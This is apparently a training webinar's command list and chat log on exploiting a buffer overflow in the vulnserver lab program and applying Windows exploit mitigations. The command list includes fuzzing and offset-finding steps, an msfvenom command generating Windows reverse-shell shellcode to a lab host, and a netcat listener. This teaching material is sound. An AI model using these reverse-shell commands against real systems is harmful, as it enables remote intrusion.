Commands used in the video:

nc 10.18.10.48 9999 -v
python ./fuzz.py
python exploit.py
import pwn
pwn.cyclic(10)
pwn.cyclic(100)
pwn.cyclic_find("aaba")
pwn.cyclic_find("aqaa")
msfvenom -f python -v shellcode -p windows/shell_reverse_tcp LHOST=10.10.10.60 LPORT=4444 EXITFUNC=thread -e x86/alpha_upper BufferRegister=esp
Get-ProcessMitigation -Name vulnserver.exe
Get-ProcessMitigation -Name vulnserver.exe -RunningProcesses
Get-ProcessMitigation -RegistryConfigFilePath settings.xml
Set-ProcessMitigation -file settings.xml
nc -lvp 443
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

======

Chat log

[CQURE] Matus (to All - Entire Audience): 18:34: Hello :)
CQURE Academy (to All - Entire Audience): 18:37: Hello everyone.
Tomasz J (to All - Entire Audience): 18:54: Good evening
Roman D (to All - Entire Audience): 18:54: good morning
dirk h (to All - Entire Audience): 18:58: Good afternoon
Rafał S (to All - Entire Audience): 19:01: hello
Roland J (to All - Entire Audience): 19:01: Hi
Robert C (to All - Entire Audience): 19:01: Hello California
Robert C (to All - Entire Audience): 19:03: Don't they call that a Feature :-)
Mayank T (to All - Entire Audience): 19:10: the last minute was not audible pl
Patrick B (to All - Entire Audience): 19:10: Audio was fine here
[CQURE] Matus (to All - Entire Audience): 19:11: All good over here as well, probably just a local problem. Is it better Mayank?
Mayank T (to All - Entire Audience): 19:11: magically it came back :)
[CQURE] Matus (to All - Entire Audience): 19:11: perfect :)
Mayank T (to All - Entire Audience): 19:12: how much would the Citrix one cost if it goes from POC to full blown exploit?
[CQURE] Matus (to All - Entire Audience): 19:16: It's rather hard to estimate that, you would have to check historical data for similar exploits and estimate based on that.
Mayank T (to All - Entire Audience): 19:19: applications written in which language would most probably have BOF vulns?
[CQURE] Matus (to All - Entire Audience): 19:23: I would say C/C++
Mayank T (to All - Entire Audience): 19:24: thanks
Mayank T (to All - Entire Audience): 19:25: are UAF vulns related here?
Mayank T (to All - Entire Audience): 19:25: ok saw it ... sorry
Martin Š (to All - Entire Audience): 19:31: is evolutionary fuzzing related to machine learning?
Martin Š (to All - Entire Audience): 19:33: thanks :-)
Tyson F (to All - Entire Audience): 19:46: vulnserver window is paused, due to cursor select
Mayank T (to All - Entire Audience): 19:46: disable windows firewall maybe :)
Tyson F (to All - Entire Audience): 19:46: right click in that window
martin l (to All - Entire Audience): 19:47: first ping
Tyson F (to All - Entire Audience): 19:47: See that there is "select" in the title bar of the vulnserver.exe window. You need to right click in it to get it out of "select text" mode.
martin l (to All - Entire Audience): 19:47: telnet 10.10.10.40 9999
Filip Vl (to All - Entire Audience): 19:48: quite embarrassing yet again
Mayank T (to All - Entire Audience): 19:48: windows firewall definitely
Mayank T (to All - Entire Audience): 19:48: ouch :)
Daniel B (to All - Entire Audience): 19:50: LOL Welcome to the real world
Alessandro R (to All - Entire Audience): 19:50: don't pause the application!
Alessandro R (to All - Entire Audience): 19:50: don't press the mouse click onto the windows
Tyson F (to All - Entire Audience): 19:50: white cursor in the CMD window is causing it to pause. To restore it, left click in that window (gets rid of select cursor).
Tyson F (to All - Entire Audience): 19:52: try hitting enter
Mayank T (to All - Entire Audience): 20:24: so diff between thread and process in ref to exiting?
[CQURE] Matus (to All - Entire Audience): 20:31: Mayank, do you mean what is the difference between EXITFUNC options in metasploit?
Tyson F (to All - Entire Audience): 20:36: If I want to deploy some exploit protection rules, such as disabling the creation of child processes through a script, is there a PowerShell module that contains these?
[CQURE] Adrian Denkiewicz (to All - Entire Audience): 20:41: For certain applications there are predefined rules, I think Artur will talk about it in a minute
osmo p (to All - Entire Audience): 20:42: do you know on what microsoft licensing level these exploit guard options are available? anything that works below e5?
Tyson F (to All - Entire Audience): 20:44: Thank you Matus.
Mayank T (to All - Entire Audience): 20:53: sorry matus had to step out... when should exit be via a thread or a process?
Mayank T (to All - Entire Audience): 20:53: why this diff?